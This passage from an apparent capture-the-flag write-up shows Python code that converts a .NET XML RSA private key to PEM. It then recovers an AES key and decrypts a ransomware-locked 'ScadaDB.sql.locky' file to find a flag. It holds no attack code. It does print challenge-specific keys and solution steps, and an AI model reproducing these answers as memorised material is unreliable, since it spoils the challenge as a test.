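The "tool" step is worth owning yourself, because the XML that .NET's RSA.ToXmlString(true) emits (an RSAKeyValue element with Modulus, Exponent, P, Q, DP, DQ, InverseQ and D, each base64 of a big-endian unsigned integer) is exactly the field list of a PKCS#1 RSAPrivateKey; wrapping that in PKCS#8 gives the BEGIN PRIVATE KEY form used above, which RSA.importKey accepts. The following is an added example, not from the original writeup, using the standard library only. It checks p*q = n and a trial encrypt/decrypt before emitting the PEM, so a mistyped XML field fails loudly instead of producing a key that silently decrypts to garbage. The sample key is a constructed textbook key (p=61, q=53) so the script runs offline, and the small DER reader at the end exists only to verify the output.

```python
import base64
import re

# AlgorithmIdentifier for rsaEncryption (OID 1.2.840.113549.1.1.1) with NULL parameters
RSA_OID = bytes.fromhex("300d06092a864886f70d0101010500")


def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_int(v: int) -> bytes:
    body = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:  # leading 0x00 keeps the INTEGER positive
        body = b"\x00" + body
    return b"\x02" + _der_len(len(body)) + body


def _der_seq(parts) -> bytes:
    body = b"".join(parts)
    return b"\x30" + _der_len(len(body)) + body


def _xml_int(xml: str, tag: str) -> int:
    m = re.search(rf"<{tag}>\s*([A-Za-z0-9+/=\s]+?)\s*</{tag}>", xml)
    if not m:
        raise ValueError(f"missing <{tag}> in RSAKeyValue")
    return int.from_bytes(base64.b64decode(m.group(1)), "big")


def xml_to_pem(xml: str) -> str:
    """Convert a private .NET RSAKeyValue XML blob to a PKCS#8 'BEGIN PRIVATE KEY' PEM."""
    fields = ("Modulus", "Exponent", "D", "P", "Q", "DP", "DQ", "InverseQ")
    n, e, d, p, q, dp, dq, qinv = (_xml_int(xml, t) for t in fields)
    if p * q != n or pow(pow(2, e, n), d, n) != 2:
        raise ValueError("inconsistent RSA parameters")
    pkcs1 = _der_seq([_der_int(x) for x in (0, n, e, d, p, q, dp, dq, qinv)])
    pkcs8 = _der_seq([_der_int(0), RSA_OID, b"\x04" + _der_len(len(pkcs1)) + pkcs1])
    b64 = base64.b64encode(pkcs8).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END PRIVATE KEY-----\n"


def rsa_xml(n: int, e: int, d: int, p: int, q: int) -> str:
    """Build the XML .NET would emit for these parameters (used here only for the constructed sample key)."""
    b64 = lambda v: base64.b64encode(v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")).decode()
    fields = [("Modulus", n), ("Exponent", e), ("P", p), ("Q", q), ("DP", d % (p - 1)),
              ("DQ", d % (q - 1)), ("InverseQ", pow(q, -1, p)), ("D", d)]
    return "<RSAKeyValue>" + "".join(f"<{k}>{b64(v)}</{k}>" for k, v in fields) + "</RSAKeyValue>"


def _read_tlv(buf: bytes, pos: int):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        nb = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    return tag, buf[pos:pos + ln], pos + ln


def _seq_elems(der: bytes) -> list:
    tag, body, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    elems, pos = [], 0
    while pos < len(body):
        tag, val, pos = _read_tlv(body, pos)
        elems.append((tag, val))
    return elems


def pem_to_params(pem: str) -> list:
    """Read back [version, n, e, d, p, q, dp, dq, qinv] from a PKCS#8 or PKCS#1 PEM (verification only)."""
    body = "".join(l.strip() for l in pem.splitlines() if not l.startswith("-----"))
    elems = _seq_elems(base64.b64decode(body))
    if len(elems) == 3 and elems[2][0] == 0x04:  # PKCS#8: version, AlgorithmIdentifier, OCTET STRING(PKCS#1)
        elems = _seq_elems(elems[2][1])
    return [int.from_bytes(v, "big") for t, v in elems if t == 0x02]


if __name__ == "__main__":
    # Constructed textbook key; paste the XML from the challenge attachment here for the real conversion
    pem = xml_to_pem(rsa_xml(3233, 17, 2753, 61, 53))
    print(pem)
    print(pem_to_params(pem))
```

The consistency check matters more than it looks: PKCS#1 v1.5 decryption with a subtly wrong key does not fail loudly, it returns bytes that merely fail the padding check, which the decryption script below surfaces as the None sentinel.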

RSA-decrypting encryptedAesKey with it recovers the AES key (shown in base64; it decodes to 32 bytes, i.e. an AES-256 key):

cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=

Then use the AES key to decrypt ScadaDB.sql.locky. The complete RSA + AES decryption script follows; it checks the RSA result instead of passing None on silently, decodes the key from base64 if the RSA plaintext comes back as text rather than raw bytes, and strips the PKCS7 padding that .NET's AES applies by default instead of padding the ciphertext:

# -*- coding: utf-8 -*-
# @Author : iker
# @Time : 2024/03/04 16:10
# @Function: RSA Privatekey Decryption & AES CBC Decryption
import base64
from Crypto.Util.Padding import unpad
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5


def rsa_decrypt(data):
    # PRIVATE_KEY: privateKey converted from .NET XML to PEM (body elided in this writeup)
    private_key = """-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----"""
    data = base64.b64decode(data)
    priobj = Cipher_pkcs1_v1_5.new(RSA.importKey(private_key))
    # PKCS#1 v1.5: decrypt() returns the sentinel (None) instead of raising when the padding check fails
    decrypted_data = priobj.decrypt(data, None)
    if decrypted_data is None:
        raise ValueError("RSA decryption failed: wrong private key or corrupted encryptedAesKey")
    return decrypted_data


def aes_cbc_decrypt(iv, key, data):
    # The ciphertext must already be block-aligned; padding it here would only append a garbage block
    if len(data) % AES.block_size != 0:
        raise ValueError("ciphertext length is not a multiple of the AES block size")
    aes = AES.new(key, AES.MODE_CBC, iv)
    plain = aes.decrypt(data)
    try:
        # .NET's AES defaults to PKCS7 padding; strip it so the SQL dump ends cleanly
        return unpad(plain, AES.block_size, 'pkcs7')
    except ValueError:
        return plain  # not PKCS7-padded: keep the raw output rather than discard data


def decrypt_file(encrypted_filepath, output_filepath, key):
    with open(encrypted_filepath, 'rb') as f:
        data = f.read()

    iv = b'\x00' * 16  # all-zero IV, as in the original script
    decryption_result = aes_cbc_decrypt(iv, key, data)

    with open(output_filepath, 'wb') as f:
        f.write(decryption_result)


if __name__ == "__main__":
    encryptedAesKey = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="
    key = rsa_decrypt(encryptedAesKey)
    # The recovered key is cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk= in base64 (32 bytes = AES-256).
    # If the RSA plaintext is that base64 text rather than the raw bytes, decode it before use.
    if len(key) not in (16, 24, 32):
        key = base64.b64decode(key)
    encrypted_filepath = "ScadaDB.sql.locky"
    output_filepath = "ScadaDB.sql"
    decrypt_file(encrypted_filepath, output_filepath, key)

Running it recovers ScadaDB.sql; flag04 is inside the database dump (grep the SQL for "flag").
